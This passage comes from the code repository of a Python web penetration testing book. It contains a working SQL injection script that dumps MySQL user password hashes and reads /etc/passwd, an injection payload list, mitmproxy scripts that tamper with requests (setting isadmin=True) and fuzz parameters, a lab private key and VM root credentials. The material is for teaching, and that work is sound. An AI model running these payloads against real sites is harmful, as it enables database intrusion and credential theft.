27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
44 | def launcher (url,dictio):
45 | injected = []
46 |
47 | for x in dictio:
48 | sqlinjection=x
49 | injected.append(url.replace("FUZZ",sqlinjection))
50 | res = injector(injected)
51 |
52 | print colored('[+] Detection results:','green')
53 | print "------------------"
54 | for x in res:
55 | print x.split(";")[0]
56 |
57 | print colored ('[+] Detect columns: ','green')
58 | print "-----------------"
59 | res = detect_columns(url)
60 | print "Number of columns: " + res
61 | res = detect_columns_names(url)
62 |
63 | print "[+] Columns names found: "
64 | print "-------------------------"
65 | for col in res:
66 | print col
67 |
68 | print colored('[+] DB version: ','green')
69 | print "---------------"
70 | detect_version(url)
71 |
72 | print colored('[+] Current USER: ','green')
73 | print "---------------"
74 | detect_user(url)
75 |
76 |
77 | print colored('[+] Get tables names:','green')
78 | print "---------------------"
79 | detect_table_names(url)
80 |
81 | print colored('[+] Attempting MYSQL user extraction','green')
82 | print "-------------------------------------"
83 | steal_users(url)
84 |
85 | filename="/etc/passwd"
86 | message = "\n[+] Reading file: " + filename
87 | print colored(message,'green')
88 | print "---------------------------------"
89 | read_file(url,filename)
90 |
91 | def injector(injected):
92 | errors = ['Mysql','error in your SQL']
93 | results = []
94 | for y in injected:
95 | print "[-] Testing errors: " + y
96 | req=requests.get(y)
97 | for x in errors:
98 | if req.content.find(x) != -1:
99 | res = y + ";" + x
100 | results.append(res)
101 | return results
102 |
103 | def detect_columns(url):
104 | new_url= url.replace("FUZZ","admin' order by X-- -")
105 | y=1
106 | while y < 20:
107 | req=requests.get(new_url.replace("X",str(y)))
108 | if req.content.find("Unknown") == -1:
109 | y+=1
110 | else:
111 | break
112 | return str(y-1)
113 |
114 | def detect_version(url):
115 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
116 | req=requests.get(new_url)
117 | raw = req.content
118 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
119 | version=re.findall(reg,req.content)
120 | for ver in version:
121 | print ver
122 | return ver
123 |
124 | def detect_user(url):
125 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',user(),'TOK')--%20-")
126 | req=requests.get(new_url)
127 | raw = req.content
128 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
129 | users=re.findall(reg,req.content)
130 | for user in users:
131 | print user
132 | return user
133 |
134 | def steal_users(url):
135 | new_url= url.replace("FUZZ","1\'%20union%20SELECT%20CONCAT('TOK',user,'TOK'),CONCAT('TOK',password,'TOK')%20FROM%20mysql.user--%20-")
136 | req=requests.get(new_url)
137 | reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
138 | users=re.findall(reg,req.content)
139 | for user in users:
140 | print user
141 |
142 | def read_file(url, filename):
143 | new_url= url.replace("FUZZ","""A\'%20union%20SELECT%201,CONCAT('TOK',
144 | LOAD_FILE(\'"+filename+"\'),'TOK')--%20-""")
145 | req=requests.get(new_url)
146 | reg = ur"TOK(.+?)TOK+?"
147 | files= re.findall(reg,req.content)
148 | print req.content
149 | for x in files:
150 | if not x.find('TOK,'):
151 | print x
152 |
153 | def detect_table_names(url):
154 | new_url= url.replace("FUZZ","\'%20union%20SELECT%20CONCAT('TOK',table_schema,'TOK'),CONCAT('TOK',table_name,'TOK')%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27%20and%20table_schema%20!=%20%27performance_schema%27%20--%20-")
155 | req=requests.get(new_url)
156 | raw = req.content
157 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
158 | tables=re.findall(reg,req.content)
159 | for table in tables:
160 | print table
161 |
162 |
163 | def detect_columns_names(url):
164 | column_names = ['username','user','name','pass','passwd','password','id','role','surname','address']
165 | new_url= url.replace("FUZZ","admin' group by X-- -")
166 | valid_cols = []
167 | for name in column_names:
168 | req=requests.get(new_url.replace("X",name))
169 | if req.content.find("Unknown") == -1:
170 | valid_cols.append(name)
171 | else:
172 | pass
173 | return valid_cols
174 |
175 | if __name__ == "__main__":
176 | try:
177 | start(sys.argv[1:])
178 | except KeyboardInterrupt:
179 | print "SQLinjector interrupted by user..!!"
180 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/injections.txt:
--------------------------------------------------------------------------------
1 | '
2 | "
3 | /
4 | /*
5 | #
6 | )
7 | (
8 | )'
9 | ('
10 | and 1=1
11 | and 1=2
12 | and 1>2
13 | and 1<2
14 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-0.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | def request(context, flow):
4 | f = open('httplogs.txt', 'a+')
5 | f.write(flow.request.url + '\n')
6 | f.close()
7 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-1.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | global history
4 | history = []
5 |
6 | def request(context, flow):
7 | global history
8 | url = flow.request.url
9 | if url not in history:
10 | f = open('httplogs.txt', 'a+')
11 | f.write(flow.request.url + '\n')
12 | f.close()
13 | history.append(url)
14 | else:
15 | pass
16 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-2.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | def request(context, flow):
4 | q = flow.request.get_query()
5 | if q:
6 | q["isadmin"] = ["True"]
7 | flow.request.set_query(q)
8 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-3.py:
--------------------------------------------------------------------------------
1 | import urlparse
2 | from copy import deepcopy
3 | import requests
4 | import sys
5 |
6 |
7 |
8 | def injector (url):
9 | errors = ['Mysql','error in your SQL']
10 | injections = ['\'','\"',';--']
11 | f = open('sqlinjection_results.txt','a+')
12 | a = urlparse.urlparse(url)
13 | query = a.query.split('&')
14 | qlen = len(query)
15 | while qlen != 0:
16 | querys = deepcopy(query)
17 | querys[qlen-1] = querys[qlen-1].split('=')[0] + '=FUZZ'
18 | newq='&'.join(querys)
19 | url_to_test = a.scheme+'://'+a.netloc+a.path+'?'+newq
20 | qlen-=1
21 | for inj in injections:
22 | req=requests.get(url_to_test.replace('FUZZ',inj))
23 | print req.content
24 | for err in errors:
25 | if req.content.find(err) != -1:
26 | res = req.url + ";" + err
27 | f.write(res)
28 | f.close()
29 |
30 | def request(context, flow):
31 | q = flow.request.get_query()
32 | print q
33 | if q:
34 | injector(flow.request.url)
35 | flow.request.set_query(q)
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/sslcaudit.0/tmpq8l6su-cert.pem:
--------------------------------------------------------------------------------
1 | Certificate:
2 | Data:
3 | Version: 4 (0x3)
4 | Serial Number: 1 (0x1)
5 | Signature Algorithm: sha1WithRSAEncryption
6 | Issuer: CN=www.example.com, C=BE, O=Gremwell bvba
7 | Validity
8 | Not Before: Jan 1 00:00:00 1970 GMT
9 | Not After : Jan 19 03:14:07 2038 GMT
10 | Subject: CN=www.example.com, C=BE, O=Gremwell bvba
11 | Subject Public Key Info:
12 | Public Key Algorithm: rsaEncryption
13 | Public-Key: (1024 bit)
14 | Modulus:
15 | 00:de:b9:0e:76:88:ff:e6:c4:85:91:51:97:e3:f7:
16 | 55:15:cf:80:7a:c0:f1:b8:70:58:ca:aa:8d:ac:3c:
17 | f1:28:56:3e:34:30:14:2c:20:9c:cb:ce:72:2d:66:
18 | d7:97:fc:64:97:89:4d:3c:ec:2c:f2:b2:fa:b0:d5:
19 | 88:42:54:37:e0:29:4f:8b:b6:eb:c0:93:ab:94:48:
20 | 40:c5:07:5a:f7:ae:e2:78:bd:d9:bd:64:41:3a:65:
21 | ad:e2:82:6c:23:6e:aa:6a:18:84:f0:1c:cb:5a:7c:
22 | 04:42:97:22:cb:21:80:45:95:5e:52:54:67:71:d5:
23 | 6f:b3:0f:c9:fc:c9:4c:b1:b7
24 | Exponent: 65537 (0x10001)
25 | Signature Algorithm: sha1WithRSAEncryption
26 | 1f:0b:a1:76:1a:c0:ed:e4:7c:77:b0:4e:e0:7e:17:7c:da:69:
27 | 8d:14:15:63:bd:a6:76:cc:e9:de:d8:29:8e:2e:0b:8e:8a:ec:
28 | ce:6e:4c:c9:5a:b5:57:54:11:53:7b:81:cd:b6:56:cb:d3:91:
29 | 9e:b7:e5:a7:d8:e6:46:11:84:d9:06:d2:b4:6a:fb:6f:6d:3e:
30 | 98:15:5f:c9:f4:1c:9c:f1:6f:13:ce:fd:51:94:d2:57:24:48:
31 | 25:a4:d3:f9:1c:78:c2:61:fc:12:a9:2a:95:dd:59:8c:58:69:
32 | ae:39:76:34:ac:ce:63:18:70:2c:73:a5:74:da:00:48:2d:93:
33 | 0e:3d
34 | -----BEGIN CERTIFICATE-----
35 | MIIB8jCCAVugAwIBAwIBATANBgkqhkiG9w0BAQUFADA/MRgwFgYDVQQDDA93d3cu
36 | ZXhhbXBsZS5jb20xCzAJBgNVBAYTAkJFMRYwFAYDVQQKDA1HcmVtd2VsbCBidmJh
37 | MB4XDTcwMDEwMTAwMDAwMFoXDTM4MDExOTAzMTQwN1owPzEYMBYGA1UEAwwPd3d3
38 | LmV4YW1wbGUuY29tMQswCQYDVQQGEwJCRTEWMBQGA1UECgwNR3JlbXdlbGwgYnZi
39 | YTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA3rkOdoj/5sSFkVGX4/dVFc+A
40 | esDxuHBYyqqNrDzxKFY+NDAULCCcy85yLWbXl/xkl4lNPOws8rL6sNWIQlQ34ClP
41 | i7brwJOrlEhAxQda967ieL3ZvWRBOmWt4oJsI26qahiE8BzLWnwEQpciyyGARZVe
42 | UlRncdVvsw/J/MlMsbcCAwEAATANBgkqhkiG9w0BAQUFAAOBgQAfC6F2GsDt5Hx3
43 | sE7gfhd82mmNFBVjvaZ2zOne2CmOLguOiuzObkzJWrVXVBFTe4HNtlbL05Get+Wn
44 | 2OZGEYTZBtK0avtvbT6YFV/J9Byc8W8Tzv1RlNJXJEglpNP5HHjCYfwSqSqV3VmM
45 | WGmuOXY0rM5jGHAsc6V02gBILZMOPQ==
46 | -----END CERTIFICATE-----
47 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/sslcaudit.0/tmpq8l6su-key.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIICXQIBAAKBgQDeuQ52iP/mxIWRUZfj91UVz4B6wPG4cFjKqo2sPPEoVj40MBQs
3 | IJzLznItZteX/GSXiU087Czysvqw1YhCVDfgKU+LtuvAk6uUSEDFB1r3ruJ4vdm9
4 | ZEE6Za3igmwjbqpqGITwHMtafARClyLLIYBFlV5SVGdx1W+zD8n8yUyxtwIDAQAB
5 | AoGAV63yi6eTVn23N2YvrYcI7/UoVyrt/fX8fox2CYBUT9Tj2Be1WUndcD5tpIIA
6 | Dc1GrIFY7srrRwA+wK7PXY1aESDKCY9sFowH3ZwdM1VG2Sn3yCRFqEfDfnrn4iMm
7 | X4jL6vWyn9bQGUjY9ofDvDGtE3JkxOrM+ybfFz7ii61x08ECQQD+5AYAUGgl/8XQ
8 | toeCC8aaLWbUMtjRkPG9ndkIbgi0ihcXkR8Sp+0LNkx3HPBCP62LCMTW/n3UejaF
9 | i6M9GCPdAkEA37Exy1kprCinnFgoOOyeD7Jt8/4+sdjxl7oEw1WiPJesm4doe2n+
10 | xpeDValCQBVH84zO0uIbatRTC2B1LAWMowJBAMbYrtHZ6JYUZoc/jpFmjGZFGx5a
11 | GInM8LpDhUgtRz9JJ2CsRzhvpt6DWr3l5o1YThPUIHO1EAcN3LDsUcncpkUCQQDK
12 | bmSNjYb00WW9Sto7iYYQ1nxCjhbWg2k+0Yx16Q0EoI4HwaZ/6RAzT/H+l0npDFks
13 | woR4uz3sk3EDnqrqx6rZAkAL4SVmorz66uaWSkItgbDnJCUiu4UOCR+mVNAasFXD
14 | ZXPYrCS4IrK59tiZ5+WD9ZnSQrYii8Sx3qTSg5MsmqUk
15 | -----END RSA PRIVATE KEY-----
16 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 Packt
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | # Learning Python Web Penetration Testing
5 |
6 |
7 |
8 | This is the code repository for [Learning Python Web Penetration Testing](https://www.packtpub.com/networking-and-servers/learning-python-web-penetration-testing?utm_source=github&utm_medium=repository&utm_campaign=9781789533972), published by Packt.
9 |
10 | **Automate web penetration testing activities using Python**
11 |
12 | ## What is this book about?
13 | Web penetration testing is the use of tools and code to attack a website or web app in order to assess its vulnerability to external threats. While there are an increasing number of sophisticated, ready-made tools to scan systems for vulnerabilities, the use of Python allows you to write system-specific scripts, or alter and extend existing testing tools to find, exploit, and record as many security weaknesses as possible. Learning Python Web Penetration Testing will walk you through the web application penetration testing methodology, showing you how to write your own tools with Python for each activity throughout the process. The book begins by emphasizing the importance of knowing how to write your own tools with Python for web application penetration testing. You will then learn to interact with a web application using Python, understand the anatomy of an HTTP request, URL, headers and message body, and later create a script to perform a request, and interpret the response and its headers. As you make your way through the book, you will write a web crawler using Python and the Scrappy library. The book will also help you to develop a tool to perform brute force attacks in different parts of the web application. You will then discover more on detecting and exploiting SQL injection vulnerabilities. By the end of this book, you will have successfully created an HTTP proxy based on the mitmproxy tool.
14 |
15 | This book covers the following exciting features:
16 | * Interact with a web application using the Python and Requests libraries
17 | * Create a basic web application crawler and make it recursive
18 | * Develop a brute force tool to discover and enumerate resources such as files and directories
19 | * Explore different authentication methods commonly used in web applications
20 | * Enumerate table names from a database using SQL injection
21 |
22 | If you feel this book is for you, get your [copy](https://www.amazon.com/dp/178953397X) today!
23 |
24 |
26 |
27 |
28 | ## Instructions and Navigations
29 | All of the code is organized into folders. For example, Chapter02.
30 |
31 | The code will look like the following:
32 | ```
33 | import requests
34 | payload= {'url':'http://www.edge-security.com'}
35 | r=requests.get('http://httpbin.org/redirect-to',params=payload)
36 | print "Status code:"
37 | ```
38 |
39 | **Following is what you need for this book:**
40 | Learning Python Web Penetration Testing is for web developers who want to step into the world of web application security testing. Basic knowledge of Python is necessary.
41 |
42 | With the following software and hardware list you can run all code files present in the book (Chapter 2-7).
43 |
44 | ### Software and Hardware List
45 |
46 | | Chapter | Software required | OS required |
47 | | -------- | ------------------------------------| -----------------------------------|
48 | | 2-7 | VirtualBox | Windows, Mac OS X, Linux, and Solaris |
49 |
50 |
51 |
52 | We also provide a PDF file that has color images of the screenshots/diagrams used in this book. [Click here to download it](https://www.packtpub.com/sites/default/files/downloads/LearningPythonWebPenetrationTesting_ColorImages.pdf).
53 |
54 | ### Related products
55 | * Web Penetration Testing with Kali Linux - Third Edition [[Packt]](https://www.packtpub.com/networking-and-servers/web-penetration-testing-kali-linux-third-edition?utm_source=github&utm_medium=repository&utm_campaign=9781788623377) [[Amazon]](https://www.amazon.com/dp/1788623371)
56 |
57 | * Python Penetration Testing Cookbook [[Packt]](https://www.packtpub.com/networking-and-servers/python-penetration-testing-cookbook?utm_source=github&utm_medium=repository&utm_campaign=9781784399771) [[Amazon]](https://www.amazon.com/dp/1784399779)
58 |
59 | ## Get to Know the Author
60 | **Christian Martorella**
61 | Christian Martorella has been working in the field of information security for the last 18 years and is currently leading the product security team for Skyscanner. Earlier, he was the principal program manager in the Skype product security team at Microsoft. His current focus is security engineering and automation. He has contributed to open source security testing tools such as Wfuzz, theHarvester, and Metagoofil, all included in Kali, the penetration testing Linux distribution.
62 |
63 |
64 |
65 | ### Suggestions and Feedback
66 | [Click here](https://docs.google.com/forms/d/e/1FAIpQLSdy7dATC6QmEL81FIUuymZ0Wy9vH1jHkvpY57OiMeKGqib_Ow/viewform) if you have any feedback or suggestions.
67 |
--------------------------------------------------------------------------------
/VM-info.txt:
--------------------------------------------------------------------------------
1 | VM link: https://drive.google.com/file/d/0ByatLxAqtgoqckVEeGZ4TE1faVE/view?usp=sharing&resourcekey=0-RgdNBlO6jpJK_9pMSc84uw
2 |
3 | OS user: root:packt2016
4 | Phpmyadmin: 127.0.0.1/phpmyadmin -> root:packt2026
5 | URL vulnerable application: http://www.scruffybank.com (from inside the VM)
6 |
7 |
--------------------------------------------------------------------------------